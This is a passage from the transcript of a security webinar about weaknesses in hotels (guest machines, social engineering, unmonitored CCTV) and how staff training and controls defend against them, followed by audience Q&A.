            • 41:00 - 41:30 reset sessions after use, leaving sensitive guest data exposed. So when the next user sits down, they can see all of the sessions, anything that the last user downloaded. Um and it will all be that system locally. If an attacker gains access to these systems, they can harvest the guest data or login credentials or even financial information. But guest machines are one of the first places I look during an engagement as downloaded files can be accessed, account credentials could be
            • 41:30 - 42:00 saved, and sessions can be used uh for users that never logged out. So to implement a session reset on the executive guest machines is something that should be a priority. Now, we've covered some of the basic attacks found on engagements, and I just want to talk about social engineering. So, attacks are attackers are experts at exploiting human behavior. They target busy environments such as hotels, um the
            • 42:00 - 42:30 front desk or the back of house areas where employees might not be paying attention. So, they'll use urgency, deception, or manipulation to gain access to restricted areas or sensitive information. And we'll scoot over some reasons why hotels are easy targets for social engineering attacks. So, hotels, as you know, are fast-paced environments, and attackers know that, too. By taking advantage of
            • 42:30 - 43:00 distractions or moments where employees are overworked or overwhelmed, they can slip under the radar and execute their attacks. And social engineering thrives in these environments. So being aware of how attackers can exploit them is crucial for your security. So an attacker could, for example, claim that they're from an IT department and urgently get access to hotel systems. If the staff members aren't trained, they can be easily exploited in these scenarios.
            • 43:00 - 43:30 So again, it's untrained or overwhelmed employees are prime targets for social engineering attacks and attackers exploit the fact that these employees may not have the right training to recognize a scam or a malicious request. So what we're also seeing as well is when there's a employee in training, they'll wear training badges and they will be the main target for our social engineering attacks because they're new and they haven't been exposed to this sort of training in their early stages
            • 43:30 - 44:00 of working for the hotel. So training your staff to recognize social engineering attacks is one of the best ways to defend against them. It's not enough just to have the right physical security measures in place. You actually need to make sure your staff know how to spot potential threats and respond appropriately. So implementing scenario-based training like that can conduct regular drills and simulations that mirror real life social
            • 44:00 - 44:30 engineering attacks would really help them build an understanding of what to spot when they are on shift. So it's almost like promoting a say some a see something say something culture. So creating a security conscious culture where employees feel comfortable reporting suspicious activity is key. A a culture like this mentally helps ensure that threats are identified and acted on before they escalate. And nine
            • 44:30 - 45:00 times out of 10 when we are on an engagement and we have to use our letter of engagement because we have been burnt or we've been compromised, it is because the staff have uh proactively reported uh suspicious activity to the relevant people uh in the organization and that's when we are questioned. So it all comes down to the staff and how they respond when seeing something that looks suspicious.
            • 45:00 - 45:30 So to wrap up, let's talk about improving your hotel's security posture. We'll look at how you can strengthen security training, physical controls, data protection measures, and more to keep your hotel secure. So a comprehensive security training for staff is essential. It's one of the most effective ways to protect your hotel and staff should be equipped with the right knowledge to identify and respond to security threats. So this includes training on
            • 45:30 - 46:00 everything from recognizing fishing attempts to handling sensitive information properly. I always say that staff are the biggest weakness on engagements and they are often the most targeted. So strengthening um physical security measures like access control or surveillance and monitoring, you can better protect your hotel against unauthorized attacks uh or unauthorized access, sorry, and ensure that only authorized personnel have access to
            • 46:00 - 46:30 restricted areas. So, it's definitely important to be having ample coverage of CCTV cameras, motion sensors, but not only that, it's also important to have someone that services this footage as well, that is actively monitoring CCTV. It's all good having cameras set up, but if there's no one there to spot suspicious activity, then they become redundant. Again, when we're on site, we can we notice that there's CCTV. However, no one's monitoring that CCTV,
            • 46:30 - 47:00 so we can get away with carrying out attacks for hours before we are questioned. And that's just because no one is reviewing this footage um and usually the head of security is engrossed in other things at the time just because their workload becomes too hectic um uh later on on a night shift. Implementing and improving data protection means encrypting sensitive guest information, securing payment systems, and ensuring that data is only
            • 47:00 - 47:30 accessible to those who need it. So, we know that strong data protection is vital for maintaining the trusts of your guests. So, limiting the amount of sensitive data collected and stored essentially reduces the potential impact of a breach. So it's worth questioning if storing sensitive information like passports is required for over a certain amount of time frame. So would they be deleted after 3 months? Is it needed to be stored? Um it would be a wise idea to
            • 47:30 - 48:00 review those processes to not continuously store that information uh for the long term. Now, regular pen testing um and vulnerability assessments help you stay ahead of potential threats. By continuously testing your systems and security measures, you can identify weaknesses and patch them before attackers getting a chance to exploit them. So, at Threat Spike, we have over a decade of experiencing and exploiting
            • 48:00 - 48:30 vulnerabilities, and we know what to look for when it comes to ensuring your premises is secure. So it's it's vital to utilize a company that can give you a detailed report into your security flaws. So obviously shameful plug, but if you like would like help in discussing these vulnerabilities, then please reach out and we'll be more than happy to assist. Now real world stories. I'm just looking at the time here. I've outlined some of our specific attacks and would
            • 48:30 - 49:00 love to go into detail and how we can leverage multiple vulnerabilities to get a foothold on a network to explore exploit an organization, but I'm going to speak to Adam and put these on another webinar. Otherwise, we're going to run massively over time. But I will speak with Adam and see if we can arrange a part two to physical penetration testing if this has gone down well today. Um, but to add value, um, I'm going to open up my inbox where I'll answer questions in as much detail as possible. So, if there's reoccurring questions, I can include these in a Q&A
            • 49:00 - 49:30 session that will allow the the whole of the threat team as much depth as possible. Fantastic. Thank you so much, Kurt. That was really good. And I do think it'll be amazing to actually see the the real world case studies. Um I for one uh would love to see you wear a GoPro some of these in case. So we can we can hope for that in the future. Um so there's been a couple of questions that have been raised during the session. I'll take the first one. Um so the first
            • 49:30 - 50:00 question is how does hospitality differ to other sectors in terms of the difficulties um that are faced and and would you say it's easier or harder and why? So I would definitely say that hospitality is is very different to other sectors. Okay. I'd say it's far harder to secure hospitality and and the main reason for that is is that there is just so many so much attack surface. There are so exposed uh elements of the business. Um,
            • 50:00 - 50:30 if I give you an example, so I used to work as a consultant and if I ever if I would have ever received an email from somebody who wasn't my direct customer or my line manager or somebody like this, then I would think it was incredibly strange. But in hospitality, you are getting emails every single day from from everywhere, you know. They could come from Gmail accounts. They could come from Yahoo, AOL, even places
            • 50:30 - 51:00 like GMX, you know, because people value their their privacy and their anominity. And so, it's incredibly difficult to screen out what are actual um legitimate security threats and you know, what are um just normal guest activity really and I think it's it's a very complicated ecosystem having to work with so many different partners through so many different applications. I I think a lot of the different vendors within hospitality don't make it easy to spot
            • 51:00 - 51:30 uh suspicious emails because they put their information um and this could be things like bids um which you know where hotels will get bid requests. These things come in all kinds of different formats and it can be again you know how is anybody really um as a as an employee unless they've worked in hospitality for a very long time supposed to actually discern what is a legitimate email versus what is somebody trying to coers them into into a fish and so that as
            • 51:30 - 52:00 well as the physical side of things I think as well um many companies will protect themselves with physical barriers you physical security controls and for hotels that quite frankly That's that's ugly, right? So, it needs to be a soft welcoming environment. Um staff need to be uh operating in a very welcoming way towards guests. So, the last thing you can do is put any kind of physical defense up in in place, you know. So it makes it very difficult and I think all of these kind of things coupled with the lower budget um that
            • 52:00 - 52:30 hospitality clients tend to have due to the the you know the high cost high um uh competition that exists within hospitality. It makes it very hard to obviously go out there and and splurge on lots and lots of different potential solutions and see what works and overstaff things and things like this. all the kind of things that say like a financial services company might do. So yeah, I genuinely think that hospitality is a very very targeted. Um we see
            • 52:30 - 53:00 things that affect hospitality much earlier than other industries and then we then see those kind of things ripple across into the the other industries in which we provide our protection for and I think that it's a very difficult environment to to protect. So then the second question, I think this is uh one for Kurt. How do you spot a bad actor who is physically on site? So the answer is you can't. It's it's
            • 53:00 - 53:30 very difficult. Um there's a lot of recon that goes into pulling off an attack and we aim to blend in. It would be very hard for an attacker to look like an attacker and attend a premises and carry out an attack. they they have to blend in. They have to carry out the attack flawlessly. So again, this falls down to how your staff react in certain scenarios. If they see something suspicious, then how are they going to
            • 53:30 - 54:00 raise it? How who are they raising it to? What's the process or the protocol when something suspicious is raised? Um it's also about having these physical security um implementations in place that can prevent uh a threat actor from taking over an organization. So it's a it's a mix of stuff that needs to be done. It's not just a one thing that I can give you that kind of points out a
            • 54:00 - 54:30 threat actor and what they look like. But I'll give you an example. we would dress up as a DPD delivery driver to bypass an entry uh point like a reception desk um and go into the building and then once we're in the building we can then leverage the machines that are in there. We can then look at sensitive information. So you're not going to be suspicious of every DPD driver that attends the premises. So again, it's about training staff and
            • 54:30 - 55:00 them having awareness of what suspicious activity looks like and training should regularly be implemented on that um as as well as implementing all security measures that you possibly can. All right, perfect. Thank you very much, Kurt. All right, well we want to thank everybody for attending this webinar. Um as I mentioned before, this is going to be a series throughout the year. We're aiming to deliver these quarterly and take people through all the new things that we've been seeing throughout the year. Um, we'll be sending out this uh
            • 55:00 - 55:30 webinar as well as a video after the session. Um, if you ever have any questions, um, feel free to reach out to us directly uh or email [email protected]. Thank you very much.